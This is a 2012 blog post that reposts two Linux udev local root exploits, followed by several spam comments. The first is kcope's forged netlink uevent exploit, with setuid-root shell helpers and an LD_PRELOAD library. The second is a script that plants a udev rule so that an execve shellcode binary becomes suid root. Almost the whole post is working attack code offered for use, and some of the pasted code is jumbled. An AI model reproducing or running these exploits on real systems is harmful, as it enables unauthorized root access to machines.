Help pay for xds lawyer fees.
LR

UDEV KERNEL EVENT Local priv escalations By Kcope and By UNKNOWN

Posted on 8th January 2012 in Exploits

UDEV Kcope bversion and the Undergroun bash version , have phunnnnnnn
XD / #HAXNET

#!/bin/sh
# Linux 2.6 Udev expl
# bug found by Sebastian Krahmer
# coded by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn't work the 1st time try more often
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif
#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0

int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;

main(int argc, char **argv) {
char sysfspath[SHORT_STRING];
char subsystem[SHORT_STRING];
char event[SHORT_STRING];
char major[SHORT_STRING];
char minor[SHORT_STRING];
sprintf(event, "add");
sprintf(subsystem, "block");
sprintf(sysfspath, "/dev/foo");
sprintf(major, "8");
sprintf(minor, "1");
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(socket_fd, (struct sockaddr *) &address, sizeof(address));
char message[LONG_STRING];
char *mp;
mp = message;
mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
mp += sprintf(mp, "ACTION=%s", event) +1;
mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
mp += sprintf(mp, "MAJOR=%s", major) +1;
mp += sprintf(mp, "MINOR=%s", minor) +1;
mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
mp += sprintf(mp, "REMOVE_CMD=/bin/bash -i") +1;
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
char *buf;
int buflen;
buf = (char *) &msg;
buflen = (int)(mp-message);
sendmsg(socket_fd, &msg, 0);
close(socket_fd);
sleep(10);
execl("/tmp/acc", "acc", (void*)0);
}

gcc ud.c -o /tmp/ud
cat > prog.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
setgid(0);
setuid(0);
unsetenv("LD_PRELOAD");
execl("/bin/sh","sh","-c","/tmp/acc",NULL);
}
gcc -o prog.o -c prog.c -fPIC
gcc -shared -Wl,-soname,slib_ex.so.1 -o slib_ex.so.1.0 prog.o -nostartfiles

int main(void) {
setgid(0);
setuid(0);
execl("/bin/sh","/bin/sh",0);
}
gcc -o /tmp/acc acc.c
cp slib_ex.so.1.0 /tmp/slib_ex.so.1.0
/tmp/ud $1

And for the best version of all…

#!/bin/sh
# ubuntu 10.04 , 10.10 udev local root
if [ -z "$1" ]
then
echo "Usage: $0 <UDEV KERNEL EVENT>"
echo "See http://www.reactivated.net/writing_udev_rules.html"
exit
fi
cat > usn.sh << EOF
#!/bin/sh
chown root:root $PWD/usn
chmod +s $PWD/usn
EOF
cat > usn.c << EOF
char *s="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
main(){
int *r;
*((int *)&r+2)=(int)s;
}
EOF
gcc usn.c -o usn
echo "KERNEL==\"$1\", RUN+=\"$PWD/usn.sh\"" >> /dev/.udev/rules.d/root.rules
chmod +x usn.sh
echo "All set, now wait for udev to restart (reinstall, udev upgrade, SE, raep, threat)"
echo "Once the conf is reloaded, just make the udev event happen : usn file will get suid-root"

Thats the Underground one wich is nice and neat,fast and furiouz :>
Enjoy them all, old now anyhow..
XD

comments: 7 » tags: ,

7 Responses to “UDEV KERNEL EVENT Local priv escalations By Kcope and By UNKNOWN”

  1. Tonette Flinn says:
    January 30, 2012 at 7:42 PM

    Thanks a bunch for sharing this with all of us you actually know what you’re talking about! Bookmarked. Please also visit my site =). We could have a link exchange arrangement between us!

    Comments : Reply
  2. June Chui says:
    January 30, 2012 at 8:38 PM

    I like this post, enjoyed this one appreciate it for putting up.

    Comments : Reply
  3. Gertie Denby says:
    January 31, 2012 at 3:46 PM

    It’s nearly impossible to find knowledgeable men and women with this topic, and you sound like there’s a lot more you might be referring to! Thanks

    Comments : Reply
  4. Dovie Klemke says:
    February 2, 2012 at 12:12 PM

    Greetings from Idaho! I’m bored at work so I decided to browse your blog on my iphone during lunch break. I really like the info you provide here and can’t wait to take a look when I get home. I’m amazed at how quick your blog loaded on my cell phone .. I’m not even using WIFI, just 3G .. Anyways, amazing blog!

    Comments : Reply
  5. Mara Reitter says:
    March 5, 2012 at 5:59 AM

    excellent post, very informative. I wonder why the other experts of this sector don’t notice this. You must continue your writing. I’m sure, you have a great readers’ base already!

    Comments : Reply
  6. Donald Gasman says:
    March 13, 2012 at 12:31 PM

    It’s really a nice and helpful piece of information. I am glad that you shared this useful information with us. Please keep us informed like this. Thanks for sharing.

    Comments : Reply


Pings responses to this post

Leave a Reply

Your email address will not be published. Required fields are marked *

*

Comment

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>